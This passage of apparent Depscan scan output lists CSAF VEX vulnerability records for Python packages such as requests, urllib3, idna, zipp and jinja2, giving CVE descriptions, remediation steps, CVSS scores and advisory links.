changes to the value of `verify`. This behavior will continue for the lifecycle of the connection in the connection pool. ### Remediation Any of these options can be used to remediate the current issue, we highly recommend upgrading as the preferred mitigation. * Upgrade to `requests>=2.32.0`. * For `requests<2.32.0`, avoid setting `verify=False` for the first request to a host while using a Requests Session. * For `requests<2.32.0`, call `close()` on `Session` objects to clear existing connections if `verify=False` is used. ### Related Links * https://github.com/psf/requests/pull/6655"}, {"category": "description", "details": "Vulnerability Description", "text": "Requests `Session` object does not verify requests after making first request with verify=False"}], "product_status": {"known_affected": ["requests@vers:pypi/>=0.0.0|<2.32.0"], "known_not_affected": ["requests@2.32.0"]}, "references": [{"summary": "GitHub Advisory GHSA-9wx4-h78v-vm56", "url": "https://github.com/psf/requests/security/advisories/GHSA-9wx4-h78v-vm56"}, {"summary": "GitHub Advisory GHSA-9wx4-h78v-vm56", "url": "https://github.com/psf/requests/security/advisories/GHSA-9wx4-h78v-vm56"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IYLSNK5TL46Q6XPRVMHVWS63MVJQOK4Q"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IYLSNK5TL46Q6XPRVMHVWS63MVJQOK4Q"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/N7WP6EYDSUOCOJYHDK5NX43PYZ4SNHGZ"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/N7WP6EYDSUOCOJYHDK5NX43PYZ4SNHGZ"}, {"summary": "CVE Record", "url": 
"https://nvd.nist.gov/vuln/detail/CVE-2024-35195"}, {"summary": "Cve 2024", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-35195"}], "scores": [{"cvss_v3": {"attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 5.6, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "environmentalScore": 5.6, "environmentalSeverity": "MEDIUM", "integrityImpact": "HIGH", "modifiedAttackComplexity": "HIGH", "modifiedAttackVector": "LOCAL", "modifiedAvailabilityImpact": "NONE", "modifiedConfidentialityImpact": "HIGH", "modifiedIntegrityImpact": "HIGH", "modifiedPrivilegesRequired": "HIGH", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "REQUIRED", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "temporalScore": 5.6, "temporalSeverity": "MEDIUM", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:N", "version": "3.1"}, "products": ["requests@vers:pypi/>=0.0.0|<2.32.0"]}], "title": "CVE-2024-35195/pkg:pypi/requests@2.31.0"}, {"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2024-3651"]}], "cve": "CVE-2024-3651", "cwe": {"id": "400", "name": "Uncontrolled Resource Consumption"}, "discovery_date": "2024-04-11T21:32:40", "ids": [{"system_name": "Huntr Advisory", "text": "93d78d07-d791-4b39-a845-cbfabc44aadb"}, {"system_name": "CVE Record", "text": "CVE-2024-3651"}, {"system_name": "GitHub Advisory", "text": "GHSA-jjg7-2v4v-x38h"}, {"system_name": "GitHub Advisory", "text": "PYSEC-2024-60"}], "notes": [{"category": "details", "details": "Vulnerability Details", "text": "# Internationalized Domain Names in Applications (IDNA) vulnerable to denial of service from specially crafted inputs to idna.encode ### Impact A specially crafted argument to the `idna.encode()` function could consume significant resources. This may lead to a denial-of-service. 
### Patches The function has been refined to reject such strings without the associated resource consumption in version 3.7. ### Workarounds Domain names cannot exceed 253 characters in length, if this length limit is enforced prior to passing the domain to the `idna.encode()` function it should no longer consume significant resources. This is triggered by arbitrarily large inputs that would not occur in normal usage, but may be passed to the library assuming there is no preliminary input validation by the higher-level application. ### References * https://huntr.com/bounties/93d78d07-d791-4b39-a845-cbfabc44aadb ## Related CVE(s) CVE-2024-3651, PYSEC-2024-60"}, {"category": "description", "details": "Vulnerability Description", "text": "Internationalized Domain Names in Applications (IDNA) vulnerable to denial of service from specially crafted inputs to idna.encode"}], "product_status": {"known_affected": ["idna@vers:pypi/>=0.1|<=3.6"]}, "references": [{"summary": "GitHub Advisory GHSA-jjg7-2v4v-x38h", "url": "https://github.com/kjd/idna/security/advisories/GHSA-jjg7-2v4v-x38h"}, {"summary": "GitHub Advisory GHSA-jjg7-2v4v-x38h", "url": "https://github.com/kjd/idna/security/advisories/GHSA-jjg7-2v4v-x38h"}, {"summary": "GitHub Advisory PYSEC-2024-60", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/idna/PYSEC-2024-60.yaml"}, {"summary": "GitHub Advisory PYSEC-2024-60", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/idna/PYSEC-2024-60.yaml"}, {"summary": "Huntr Advisory 93d78d07-d791-4b39-a845-cbfabc44aadb", "url": "https://huntr.com/bounties/93d78d07-d791-4b39-a845-cbfabc44aadb"}, {"summary": "Huntr Advisory 93d78d07-d791-4b39-a845-cbfabc44aadb", "url": "https://huntr.com/bounties/93d78d07-d791-4b39-a845-cbfabc44aadb"}, {"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3651"}, {"summary": "Cve 2024", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3651"}], "scores": [{"cvss_v3": {"attackComplexity": 
"LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 6.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "environmentalScore": 6.2, "environmentalSeverity": "MEDIUM", "integrityImpact": "NONE", "modifiedAttackComplexity": "LOW", "modifiedAttackVector": "LOCAL", "modifiedAvailabilityImpact": "HIGH", "modifiedConfidentialityImpact": "NONE", "modifiedIntegrityImpact": "NONE", "modifiedPrivilegesRequired": "NONE", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "temporalScore": 6.2, "temporalSeverity": "MEDIUM", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1"}, "products": ["idna@vers:pypi/>=0.1|<=3.6"]}], "title": "CVE-2024-3651/pkg:pypi/idna@3.4"}, {"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2024-37891"]}], "cve": "CVE-2024-37891", "cwe": {"id": "669", "name": "Incorrect Resource Transfer Between Spheres"}, "discovery_date": "2024-06-17T21:37:20", "ids": [{"system_name": "CVE Record", "text": "CVE-2024-37891"}, {"system_name": "GitHub Advisory", "text": "GHSA-34jh-p97f-mpxf"}], "notes": [{"category": "details", "details": "Vulnerability Details", "text": "# urllib3's Proxy-Authorization request header isn't stripped during cross-origin redirects When using urllib3's proxy support with `ProxyManager`, the `Proxy-Authorization` header is only sent to the configured proxy, as expected. However, when sending HTTP requests *without* using urllib3's proxy support, it's possible to accidentally configure the `Proxy-Authorization` header even though it won't have any effect as the request is not using a forwarding proxy or a tunneling proxy. In those cases, urllib3 doesn't treat the `Proxy-Authorization` HTTP header as one carrying authentication material and thus doesn't strip the header on cross-origin redirects. 
Because this is a highly unlikely scenario, we believe the severity of this vulnerability is low for almost all users. Out of an abundance of caution urllib3 will automatically strip the `Proxy-Authorization` header during cross-origin redirects to avoid the small chance that users are doing this on accident. Users should use urllib3's proxy support or disable automatic redirects to achieve safe processing of the `Proxy-Authorization` header, but we still decided to strip the header by default in order to further protect users who aren't using the correct approach. ## Affected usages We believe the number of usages affected by this advisory is low. It requires all of the following to be true to be exploited: * Setting the `Proxy-Authorization` header without using urllib3's built-in proxy support. * Not disabling HTTP redirects. * Either not using an HTTPS origin server or for the proxy or target origin to redirect to a malicious origin. ## Remediation * Using the `Proxy-Authorization` header with urllib3's `ProxyManager`. * Disabling HTTP redirects using `redirects=False` when sending requests. 
* Not using the `Proxy-Authorization` header."}, {"category": "description", "details": "Vulnerability Description", "text": "urllib3's Proxy-Authorization request header isn't stripped during cross-origin redirects "}], "product_status": {"known_affected": ["urllib3@vers:pypi/>=2.0.0|<2.2.2"], "known_not_affected": ["urllib3@2.2.2"]}, "references": [{"summary": "GitHub Advisory GHSA-34jh-p97f-mpxf", "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-34jh-p97f-mpxf"}, {"summary": "GitHub Advisory GHSA-34jh-p97f-mpxf", "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-34jh-p97f-mpxf"}, {"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-37891"}, {"summary": "Cve 2024", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-37891"}], "scores": [{"cvss_v3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "environmentalScore": 4.4, "environmentalSeverity": "MEDIUM", "integrityImpact": "NONE", "modifiedAttackComplexity": "HIGH", "modifiedAttackVector": "NETWORK", "modifiedAvailabilityImpact": "NONE", "modifiedConfidentialityImpact": "HIGH", "modifiedIntegrityImpact": "NONE", "modifiedPrivilegesRequired": "HIGH", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "NONE", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "temporalScore": 4.4, "temporalSeverity": "MEDIUM", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N", "version": "3.1"}, "products": ["urllib3@vers:pypi/>=2.0.0|<2.2.2"]}], "title": "CVE-2024-37891/pkg:pypi/urllib3@2.0.4"}, {"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2024-39689"]}], "cve": "CVE-2024-39689", "cwe": {"id": "345", "name": "Insufficient Verification of Data Authenticity"}, "discovery_date": "2024-07-05T20:06:40", "ids": [{"system_name": "CVE Record", "text": "CVE-2024-39689"}, 
{"system_name": "GitHub Advisory", "text": "GHSA-248v-346w-9cwc"}], "notes": [{"category": "details", "details": "Vulnerability Details", "text": "# Certifi removes GLOBALTRUST root certificate Certifi 2024.07.04 removes root certificates from \"GLOBALTRUST\" from the root store. These are in the process of being removed from Mozilla's trust store. GLOBALTRUST's root certificates are being removed pursuant to an investigation which identified \"long-running and unresolved compliance issues\". Conclusions of Mozilla's investigation can be found [here]( https://groups.google.com/a/mozilla.org/g/dev-security-policy/c/XpknYMPO8dI)."}, {"category": "description", "details": "Vulnerability Description", "text": "Certifi removes GLOBALTRUST root certificate"}], "product_status": {"known_affected": ["certifi@vers:pypi/>=2021.05.30|<2024.07.04"], "known_not_affected": ["certifi@2024.07.04"]}, "references": [{"summary": "GitHub Advisory GHSA-248v-346w-9cwc", "url": "https://github.com/certifi/python-certifi/security/advisories/GHSA-248v-346w-9cwc"}, {"summary": "GitHub Advisory GHSA-248v-346w-9cwc", "url": "https://github.com/certifi/python-certifi/security/advisories/GHSA-248v-346w-9cwc"}, {"summary": "Google Mailing List", "url": "https://groups.google.com/a/mozilla.org/g/dev-security-policy/c/XpknYMPO8dI"}, {"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-39689"}, {"summary": "Cve 2024", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-39689"}], "scores": [{"cvss_v3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 3.1, "baseSeverity": "LOW", "confidentialityImpact": "LOW", "environmentalScore": 3.1, "environmentalSeverity": "LOW", "integrityImpact": "NONE", "modifiedAttackComplexity": "HIGH", "modifiedAttackVector": "NETWORK", "modifiedAvailabilityImpact": "NONE", "modifiedConfidentialityImpact": "LOW", "modifiedIntegrityImpact": "NONE", "modifiedPrivilegesRequired": "NONE", "modifiedScope": 
"UNCHANGED", "modifiedUserInteraction": "REQUIRED", "privilegesRequired": "NONE", "scope": "UNCHANGED", "temporalScore": 3.1, "temporalSeverity": "LOW", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N", "version": "3.1"}, "products": ["certifi@vers:pypi/>=2021.05.30|<2024.07.04"]}], "title": "CVE-2024-39689/pkg:pypi/certifi@2023.7.22"}, {"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2024-5569"]}], "cve": "CVE-2024-5569", "cwe": {"id": "400", "name": "Uncontrolled Resource Consumption"}, "discovery_date": "2024-07-09T00:31:40", "ids": [{"system_name": "CVE Record", "text": "CVE-2024-5569"}, {"system_name": "Huntr Advisory", "text": "be898306-11f9-46b4-b28c-f4c4aa4ffbae"}], "notes": [{"category": "details", "details": "Vulnerability Details", "text": "# zipp Denial of Service vulnerability A Denial of Service (DoS) vulnerability exists in the jaraco/zipp library, affecting all versions prior to 3.19.1. The vulnerability is triggered when processing a specially crafted zip file that leads to an infinite loop. This issue also impacts the zipfile module of CPython, as features from the third-party zipp library are later merged into CPython, and the affected code is identical in both projects. The infinite loop can be initiated through the use of functions affecting the `Path` module in both zipp and zipfile, such as `joinpath`, the overloaded division operator, and `iterdir`. Although the infinite loop is not resource exhaustive, it prevents the application from responding. 
The vulnerability was addressed in version 3.19.1 of jaraco/zipp."}, {"category": "description", "details": "Vulnerability Description", "text": "zipp Denial of Service vulnerability"}], "product_status": {"known_affected": ["zipp@vers:pypi/>=0.1.0|<=3.19.0"], "known_not_affected": ["zipp@3.19.1"]}, "references": [{"summary": "Huntr Advisory be898306-11f9-46b4-b28c-f4c4aa4ffbae", "url": "https://huntr.com/bounties/be898306-11f9-46b4-b28c-f4c4aa4ffbae"}, {"summary": "Huntr Advisory be898306-11f9-46b4-b28c-f4c4aa4ffbae", "url": "https://huntr.com/bounties/be898306-11f9-46b4-b28c-f4c4aa4ffbae"}, {"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-5569"}, {"summary": "Cve 2024", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-5569"}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 6.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "environmentalScore": 6.2, "environmentalSeverity": "MEDIUM", "integrityImpact": "NONE", "modifiedAttackComplexity": "LOW", "modifiedAttackVector": "LOCAL", "modifiedAvailabilityImpact": "HIGH", "modifiedConfidentialityImpact": "NONE", "modifiedIntegrityImpact": "NONE", "modifiedPrivilegesRequired": "NONE", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "temporalScore": 6.2, "temporalSeverity": "MEDIUM", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0"}, "products": ["zipp@vers:pypi/>=0.1.0|<=3.19.0"]}], "title": "CVE-2024-5569/pkg:pypi/zipp@3.16.2"}]}}, "result_14": {"common_summary": {"document": {"aggregate_severity": {"text": "High"}, "category": "csaf_vex", "csaf_version": "2.0", "lang": "en", "notes": [{"category": "legal_disclaimer", "text": "Depscan reachable code only covers the project source code, not the code of dependencies. 
A dependency may execute vulnerable code when called even if it is not in the project's source code. Regard the Depscan-set flag of 'code_not_in_execute_path' with this in mind."}], "publisher": {"category": "vendor", "contact_details": "vendor@mcvendorson.com", "name": "Vendor McVendorson", "namespace": "https://appthreat.com"}, "title": "Your Title"}, "product_tree": {"full_product_names": [{"name": "tinydb", "product_id": "tinydb:4.8.0", "product_identification_helper": {"purl": "pkg:pypi/tinydb@4.8.0"}}]}, "vulnerabilities": [{"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2022-42969"]}], "cve": "CVE-2022-42969", "cwe": {"id": "1333", "name": "Inefficient Regular Expression Complexity"}, "discovery_date": "2022-10-16T12:00:23", "ids": [{"system_name": "CVE Record", "text": "CVE-2022-42969"}, {"system_name": "Pypi Advisory", "text": "py"}], "notes": [{"category": "details", "details": "Vulnerability Details", "text": "# ReDoS in py library when used with subversion The py library through 1.11.0 for Python allows remote attackers to conduct a ReDoS (Regular expression Denial of Service) attack via a Subversion repository with crafted info data, because the InfoSvnCommand argument is mishandled. The particular codepath in question is the regular expression at `py._path.svnurl.InfoSvnCommand.lspattern` and is only relevant when dealing with subversion (svn) projects. Notably the codepath is not used in the popular pytest project. The developers of the pytest package have released version `7.2.0` which removes their dependency on `py`. Users of `pytest` seeing alerts relating to this advisory may update to version `7.2.0` of `pytest` to resolve this issue. See https://github.com/pytest-dev/py/issues/287#issuecomment-1290407715 for additional context. 
## Related CVE(s) CVE-2022-42969, PYSEC-2022-42969"}, {"category": "description", "details": "Vulnerability Description", "text": "ReDoS in py library when used with subversion "}], "product_status": {"known_affected": ["py@vers:pypi/>=0.0.0|<=1.11.0"]}, "references": [{"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-42969"}, {"summary": "Cve 2022", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-42969"}, {"summary": "Pypi Advisory py", "url": "https://pypi.org/project/py"}, {"summary": "Pypi Advisory py", "url": "https://pypi.org/project/py"}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "environmentalScore": 7.5, "environmentalSeverity": "HIGH", "integrityImpact": "NONE", "modifiedAttackComplexity": "LOW", "modifiedAttackVector": "NETWORK", "modifiedAvailabilityImpact": "HIGH", "modifiedConfidentialityImpact": "NONE", "modifiedIntegrityImpact": "NONE", "modifiedPrivilegesRequired": "NONE", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "temporalScore": 7.5, "temporalSeverity": "HIGH", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1"}, "products": ["py@vers:pypi/>=0.0.0|<=1.11.0"]}], "title": "CVE-2022-42969/pkg:pypi/py@1.11.0"}, {"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2023-45803"]}], "cve": "CVE-2023-45803", "cwe": {"id": "200", "name": "Exposure of Sensitive Information to an Unauthorized Actor"}, "discovery_date": "2023-10-17T20:15:25", "ids": [{"system_name": "CVE Record", "text": "CVE-2023-45803"}, {"system_name": "GitHub Advisory", "text": "GHSA-g4mx-q9vg-27p4"}, {"system_name": "GitHub Advisory", "text": "PYSEC-2023-212"}, {"system_name": "Rfc-editor Advisory", "text": "rfc9110"}], "notes": [{"category": 
"details", "details": "Vulnerability Details", "text": "# urllib3's request body not stripped after redirect from 303 status changes request method to GET urllib3 previously wouldn't remove the HTTP request body when an HTTP redirect response using status 303 \"See Other\" after the request had its method changed from one that could accept a request body (like `POST`) to `GET` as is required by HTTP RFCs. Although the behavior of removing the request body is not specified in the section for redirects, it can be inferred by piecing together information from different sections and we have observed the behavior in other major HTTP client implementations like curl and web browsers. From [RFC 9110 Section 9.3.1](https://www.rfc-editor.org/rfc/rfc9110.html#name-get): > A client SHOULD NOT generate content in a GET request unless it is made directly to an origin server that has previously indicated, in or out of band, that such a request has a purpose and will be adequately supported. ## Affected usages Because the vulnerability requires a previously trusted service to become compromised in order to have an impact on confidentiality we believe the exploitability of this vulnerability is low. Additionally, many users aren't putting sensitive data in HTTP request bodies, if this is the case then this vulnerability isn't exploitable. Both of the following conditions must be true to be affected by this vulnerability: * If you're using urllib3 and submitting sensitive information in the HTTP request body (such as form data or JSON) * The origin service is compromised and starts redirecting using 303 to a malicious peer or the redirected-to service becomes compromised. ## Remediation You can remediate this vulnerability with any of the following steps: * Upgrade to a patched version of urllib3 (v1.26.18 or v2.0.7) * Disable redirects for services that you aren't expecting to respond with redirects with `redirects=False`. 
* Disable automatic redirects with `redirects=False` and handle 303 redirects manually by stripping the HTTP request body. ## Related CVE(s) CVE-2023-45803, PYSEC-2023-212"}, {"category": "description", "details": "Vulnerability Description", "text": "urllib3's request body not stripped after redirect from 303 status changes request method to GET"}], "product_status": {"known_affected": ["urllib3@vers:pypi/>=2.0.0|<2.0.7"], "known_not_affected": ["urllib3@2.0.7"]}, "references": [{"summary": "GitHub Advisory PYSEC-2023-212", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/urllib3/PYSEC-2023-212.yaml"}, {"summary": "GitHub Advisory PYSEC-2023-212", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/urllib3/PYSEC-2023-212.yaml"}, {"summary": "GitHub Advisory GHSA-g4mx-q9vg-27p4", "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-g4mx-q9vg-27p4"}, {"summary": "GitHub Advisory GHSA-g4mx-q9vg-27p4", "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-g4mx-q9vg-27p4"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4R2Y5XK3WALSR3FNAGN7JBYV2B343ZKB"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4R2Y5XK3WALSR3FNAGN7JBYV2B343ZKB"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5F5CUBAN5XMEBVBZPHFITBLMJV5FIJJ5"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5F5CUBAN5XMEBVBZPHFITBLMJV5FIJJ5"}, {"summary": "Fedora Project Mailing List Announcement", "url": 
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PPDPLM6UUMN55ESPQWJFLLIZY4ZKCNRX"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PPDPLM6UUMN55ESPQWJFLLIZY4ZKCNRX"}, {"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45803"}, {"summary": "Cve 2023", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45803"}, {"summary": "Rfc-editor Advisory rfc9110", "url": "https://www.rfc-editor.org/rfc/rfc9110.html#name-get"}, {"summary": "Rfc-editor Advisory rfc9110", "url": "https://www.rfc-editor.org/rfc/rfc9110.html#name-get"}], "scores": [{"cvss_v3": {"attackComplexity": "HIGH", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "NONE", "baseScore": 4.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "environmentalScore": 4.2, "environmentalSeverity": "MEDIUM", "integrityImpact": "NONE", "modifiedAttackComplexity": "HIGH", "modifiedAttackVector": "ADJACENT_NETWORK", "modifiedAvailabilityImpact": "NONE", "modifiedConfidentialityImpact": "HIGH", "modifiedIntegrityImpact": "NONE", "modifiedPrivilegesRequired": "HIGH", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "NONE", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "temporalScore": 4.2, "temporalSeverity": "MEDIUM", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N", "version": "3.1"}, "products": ["urllib3@vers:pypi/>=2.0.0|<2.0.7"]}], "title": "CVE-2023-45803/pkg:pypi/urllib3@2.0.4"}, {"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2024-22195"]}], "cve": "CVE-2024-22195", "cwe": {"id": "79", "name": "Improper Neutralization of Input During Web Page Generation"}, "discovery_date": "2024-01-11T15:20:48", "ids": [{"system_name": "CVE Record", "text": "CVE-2024-22195"}, {"system_name": "GitHub Advisory", "text": 
"GHSA-h5c8-rqwp-cp95"}], "notes": [{"category": "details", "details": "Vulnerability Details", "text": "# Jinja vulnerable to HTML attribute injection when passing user input as keys to xmlattr filter The `xmlattr` filter in affected versions of Jinja accepts keys containing spaces. XML/HTML attributes cannot contain spaces, as each would then be interpreted as a separate attribute. If an application accepts keys (as opposed to only values) as user input, and renders these in pages that other users see as well, an attacker could use this to inject other attributes and perform XSS. Note that accepting keys as user input is not common or a particularly intended use case of the `xmlattr` filter, and an application doing so should already be verifying what keys are provided regardless of this fix."}, {"category": "description", "details": "Vulnerability Description", "text": "Jinja vulnerable to HTML attribute injection when passing user input as keys to xmlattr filter"}], "product_status": {"known_affected": ["jinja2@vers:pypi/>=2.0|<=3.1.2"]}, "references": [{"summary": "GitHub Advisory GHSA-h5c8-rqwp-cp95", "url": "https://github.com/pallets/jinja/security/advisories/GHSA-h5c8-rqwp-cp95"}, {"summary": "GitHub Advisory GHSA-h5c8-rqwp-cp95", "url": "https://github.com/pallets/jinja/security/advisories/GHSA-h5c8-rqwp-cp95"}, {"summary": "Debian Mailing List Announcement", "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00010.html"}, {"summary": "Debian Mailing List Announcement", "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00010.html"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5XCWZD464AJJJUBOO7CMPXQ4ROBC6JX2"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5XCWZD464AJJJUBOO7CMPXQ4ROBC6JX2"}, {"summary": 
"Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DELCVUUYX75I5K4Q5WMJG4MUZJA6VAIP"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DELCVUUYX75I5K4Q5WMJG4MUZJA6VAIP"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/O7YWRBX6JQCWC2XXCTZ55C7DPMGICCN3"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/O7YWRBX6JQCWC2XXCTZ55C7DPMGICCN3"}, {"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22195"}, {"summary": "Cve 2024", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22195"}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "environmentalScore": 5.4, "environmentalSeverity": "MEDIUM", "integrityImpact": "LOW", "modifiedAttackComplexity": "LOW", "modifiedAttackVector": "NETWORK", "modifiedAvailabilityImpact": "NONE", "modifiedConfidentialityImpact": "LOW", "modifiedIntegrityImpact": "LOW", "modifiedPrivilegesRequired": "NONE", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "REQUIRED", "privilegesRequired": "NONE", "scope": "UNCHANGED", "temporalScore": 5.4, "temporalSeverity": "MEDIUM", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "version": "3.1"}, "products": ["jinja2@vers:pypi/>=2.0|<=3.1.2"]}], "title": "CVE-2024-22195/pkg:pypi/jinja2@3.1.2"}, {"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2024-34064"]}], "cve": "CVE-2024-34064", "cwe": {"id": "79", "name": "Improper 
Neutralization of Input During Web Page Generation"}, "discovery_date": "2024-05-06T14:20:59", "ids": [{"system_name": "CVE Record", "text": "CVE-2024-34064"}, {"system_name": "GitHub Advisory", "text": "GHSA-h75v-3vvj-5mfj"}], "notes": [{"category": "details", "details": "Vulnerability Details", "text": "# Jinja vulnerable to HTML attribute injection when passing user input as keys to xmlattr filter The `xmlattr` filter in affected versions of Jinja accepts keys containing non-attribute characters. XML/HTML attributes cannot contain spaces, `/`, `>`, or `=`, as each would then be interpreted as starting a separate attribute. If an application accepts keys (as opposed to only values) as user input, and renders these in pages that other users see as well, an attacker could use this to inject other attributes and perform XSS. The fix for the previous GHSA-h5c8-rqwp-cp95 CVE-2024-22195 only addressed spaces but not other characters. Accepting keys as user input is now explicitly considered an unintended use case of the `xmlattr` filter, and code that does so without otherwise validating the input should be flagged as insecure, regardless of Jinja version. 
